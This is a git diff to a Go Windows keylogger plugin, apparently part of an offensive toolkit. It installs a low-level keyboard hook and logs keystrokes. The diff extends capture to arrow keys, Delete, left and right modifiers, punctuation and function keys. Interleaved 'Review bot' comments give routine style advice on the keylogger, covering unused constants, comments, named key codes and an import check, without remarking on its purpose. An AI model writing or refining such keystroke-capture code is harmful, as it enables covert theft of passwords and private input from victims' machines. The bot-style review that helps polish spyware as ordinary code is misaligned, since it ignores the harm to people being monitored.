diff --git a/Plugins/local/keylogger/keylogger_windows.go b/Plugins/local/keylogger/keylogger_windows.go
index 6ec214c..087d38d 100644
--- a/Plugins/local/keylogger/keylogger_windows.go
+++ b/Plugins/local/keylogger/keylogger_windows.go
@@ -28,7 +28,9 @@ var (
 const (
 WH_KEYBOARD_LL = 13
 WM_KEYDOWN = 0x0100
+ WM_KEYUP = 0x0101
 WM_SYSKEYDOWN = 0x0104
+ WM_SYSKEYUP = 0x0105
 )
 type (
@@ -162,7 +164,7 @@ func (p *KeyloggerPlugin) startKeyboardHook() {
 }
 }
-// keyboardHookProc Hook回调函数 - 最高效版本
+// keyboardHookProc Hook回调函数 - 简化版本
 func keyboardHookProc(nCode int, wParam WPARAM, lParam LPARAM) LRESULT {
 // 立即调用下一个Hook,确保系统响应
 ret, _, _ := procCallNextHookEx.Call(
@@ -176,17 +178,22 @@ func keyboardHookProc(nCode int, wParam WPARAM, lParam LPARAM) LRESULT {
 if nCode >= 0 && eventChannel != nil {
 if wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN {
 kbdStruct := (*KBDLLHOOKSTRUCT)(unsafe.Pointer(lParam))
+ vkCode := kbdStruct.VkCode
- // 非阻塞发送事件
- select {
- case eventChannel <- KeyboardEvent{
- Kind: KeyDown,
- Rawcode: uint16(kbdStruct.VkCode),
- Keychar: quickKeyChar(kbdStruct.VkCode),
- Timestamp: time.Now(),
- }:
- default:
- // 通道满了就跳过,不阻塞系统
+
+ keychar := quickKeyChar(vkCode)
+ if keychar != "" {
+ // 非阻塞发送事件
+ select {
+ case eventChannel <- KeyboardEvent{
+ Kind: KeyDown,
+ Rawcode: uint16(vkCode),
+ Keychar: keychar,
+ Timestamp: time.Now(),
+ }:
+ default:
+ // 通道满了就跳过,不阻塞系统
+ }
 }
 }
 }
@@ -240,13 +247,18 @@ func (p *KeyloggerPlugin) writeLogHeader() {
 logFile.Sync()
 }
-// quickKeyChar 快速键码转字符(高度优化版本)
+// quickKeyChar 快速键码转字符(简化版本)
 func quickKeyChar(vkCode DWORD) string {
 switch {
- case vkCode >= 0x30 && vkCode <= 0x39: // 数字0-9
+ // 数字0-9
+ case vkCode >= 0x30 && vkCode <= 0x39:
 return string(rune(vkCode))
- case vkCode >= 0x41 && vkCode <= 0x5A: // 字母A-Z
- return string(rune(vkCode + 32)) // 转小写
+
+ // 字母A-Z (统一转小写)
+ case vkCode >= 0x41 && vkCode <= 0x5A:
+ return string(rune(vkCode + 32))
+
+ // 基本特殊字符
 case vkCode == 0x20:
 return " "
 case vkCode == 0x0D:
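Review bot: `WM_KEYUP` and `WM_SYSKEYUP` are added to the const block in the first hunk, but nothing in the visible hunks reads them; keyboardHookProc still tests only `WM_KEYDOWN` and `WM_SYSKEYDOWN`. If no code outside this diff references them, drop the two lines so the block lists only the messages the callback actually handles. Go does not report unused constants, so this kind of dead declaration will not surface at build time.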
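Review bot: The new `if keychar != ""` guard in keyboardHookProc (third hunk) is undocumented: the only comment inside it still describes the non-blocking send, and the function's header comment was merely reworded. The guard changes which events reach `eventChannel`, so a reader of the consumer side needs to know about it; I would add a line above it such as `// keys for which quickKeyChar returns "" are not queued`. The function's opening and its return statement lie outside this hunk.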
@@ -255,14 +267,47 @@ func quickKeyChar(vkCode DWORD) string {
 return "[Backspace]"
 case vkCode == 0x09:
 return "[Tab]"
- case vkCode == 0x10:
- return "[Shift]"
- case vkCode == 0x11:
- return "[Ctrl]"
- case vkCode == 0x12:
- return "[Alt]"
 case vkCode == 0x1B:
 return "[Esc]"
+ case vkCode == 0x2E:
+ return "[Delete]"
+
+ // 方向键
+ case vkCode == 0x25:
+ return "[Left]"
+ case vkCode == 0x26:
+ return "[Up]"
+ case vkCode == 0x27:
+ return "[Right]"
+ case vkCode == 0x28:
+ return "[Down]"
+
+ // 特殊键 (包括左右Shift/Ctrl/Alt)
+ case vkCode == 0x10 || vkCode == 0xA0 || vkCode == 0xA1: // VK_SHIFT, VK_LSHIFT, VK_RSHIFT
+ return "[Shift]"
+ case vkCode == 0x11 || vkCode == 0xA2 || vkCode == 0xA3: // VK_CONTROL, VK_LCONTROL, VK_RCONTROL
+ return "[Ctrl]"
+ case vkCode == 0x12 || vkCode == 0xA4 || vkCode == 0xA5: // VK_MENU, VK_LMENU, VK_RMENU
+ return "[Alt]"
+
+ // 基本标点符号
+ case vkCode == 0xBA: // ;
+ return ";"
+ case vkCode == 0xBB: // =
+ return "="
+ case vkCode == 0xBC: // ,
+ return ","
+ case vkCode == 0xBD: // -
+ return "-"
+ case vkCode == 0xBE: // .
+ return "."
+ case vkCode == 0xBF: // /
+ return "/"
+
+ // 功能键
+ case vkCode >= 0x70 && vkCode <= 0x7B: // F1-F12
+ return fmt.Sprintf("[F%d]", vkCode-0x6F)
+
 default:
 return "" // 跳过其他按键,保持高性能
 }
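Review bot: The new cases in quickKeyChar compare against bare hex literals (`0x2E`, `0x25`–`0x28`, `0xA0`–`0xA5`, `0xBA`–`0xBF`, `0x70`–`0x7B`), and only the modifier cases name the VK_* value in a trailing comment. The file already declares the window messages as named constants (`WM_KEYDOWN` and friends), so giving the virtual-key codes the same treatment, e.g. `VK_DELETE = 0x2E`, would let the switch be read without a key-code table. The F-key branch also introduces a call to `fmt.Sprintf` while no import change is visible in this diff, so confirm that `fmt` is already imported by the file. The switch statement begins outside this hunk.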